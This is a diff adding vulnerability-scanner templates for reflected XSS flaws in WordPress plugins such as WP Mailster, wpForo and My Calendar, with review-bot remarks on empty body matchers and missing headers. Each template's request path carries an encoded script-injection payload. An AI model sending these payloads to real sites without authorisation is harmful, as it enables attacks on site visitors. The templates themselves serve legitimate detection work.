diff --git a/CVE-2017-17043.yaml b/CVE-2017-17043.yaml
new file mode 100644
index 0000000..3d321b4
--- /dev/null
+++ b/CVE-2017-17043.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17043
+
+info:
+ name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
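Review bot: The body matcher's only word is the empty string `""` as this page shows it, and an empty word matches every body, so the verdict rests on `status: 200` plus `text/html` alone and any ordinary page at that path would be reported as vulnerable. The word should be the decoded form of the markup the path sends, for this template `- '<script>alert(123)</script>'`, so the match proves the input came back unencoded. The original word may simply have been lost when the page was rendered, which is worth checking against the committed file. The same empty word appears in the body matcher of CVE-2017-17059, CVE-2017-17451, CVE-2017-18536, CVE-2017-9288, CVE-2018-11709, CVE-2018-20462 and CVE-2018-5316 in this diff, and each needs the decoded form of its own payload.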
diff --git a/CVE-2017-17059.yaml b/CVE-2017-17059.yaml
new file mode 100644
index 0000000..ecf71fa
--- /dev/null
+++ b/CVE-2017-17059.yaml
@@ -0,0 +1,34 @@
+id: CVE-2017-17059
+
+info:
+ name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+ reference: |
+ - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+
+ body: "amty_hidden=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
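Review bot: The POST request sends `body: "amty_hidden=1"` without a Content-Type header, and PHP fills `$_POST` only from a body declared as form-encoded. If the plugin reads `amty_hidden` from `$_POST` (not visible here), the vulnerable branch may never run and the template would miss affected sites. I would add `headers:` with `Content-Type: application/x-www-form-urlencoded` above the `body:` line. Separately, `reference: |` makes the two URLs one literal string with leading dashes; dropping the `|` gives a real list, and the same applies to the `reference:` field in CVE-2019-15713.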
diff --git a/CVE-2017-17451.yaml b/CVE-2017-17451.yaml
new file mode 100644
index 0000000..40a4e59
--- /dev/null
+++ b/CVE-2017-17451.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17451
+
+info:
+ name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-18536.yaml b/CVE-2017-18536.yaml
new file mode 100644
index 0000000..5ac65f8
--- /dev/null
+++ b/CVE-2017-18536.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-18536
+
+info:
+ name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+ reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
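Review bot: The `description:` line names neither the affected versions nor the injection point, although the `name:` gives 1.3.5-1.3.7 and the request injects through the `author` query parameter. Someone triaging a hit gets no indication of what to patch or which input to look at. I would reword it along the lines of `description: The Stop User Enumeration plugin 1.3.5-1.3.7 for WordPress reflects the author query parameter without encoding, allowing unauthenticated reflected XSS.` after confirming the version range against the referenced advisory.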
diff --git a/CVE-2017-9288.yaml b/CVE-2017-9288.yaml
new file mode 100644
index 0000000..19bdc03
--- /dev/null
+++ b/CVE-2017-9288.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-9288
+
+info:
+ name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-11709.yaml b/CVE-2018-11709.yaml
new file mode 100644
index 0000000..4f305a6
--- /dev/null
+++ b/CVE-2018-11709.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-11709
+
+info:
+ name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
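Review bot: The single `path:` entry hard-codes `/index.php/community/`, which is wpForo's default forum page slug. A site that serves the forum under another slug is never reached, so a no-match there says nothing about whether the plugin is patched. I would record that limit above the path with a comment such as `# assumes the default forum slug "community"; a miss does not rule out the issue on sites that renamed the forum page`.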
diff --git a/CVE-2018-20462.yaml b/CVE-2018-20462.yaml
new file mode 100644
index 0000000..79a0cbd
--- /dev/null
+++ b/CVE-2018-20462.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-20462
+
+info:
+ name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-5316.yaml b/CVE-2018-5316.yaml
new file mode 100644
index 0000000..7553a25
--- /dev/null
+++ b/CVE-2018-5316.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-5316
+
+info:
+ name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2019-15713.yaml b/CVE-2019-15713.yaml
new file mode 100644
index 0000000..55c9e48
--- /dev/null
+++ b/CVE-2019-15713.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-15713
+
+info:
+ name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
+ reference: |
+ - https://wpscan.com/vulnerability/9267
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "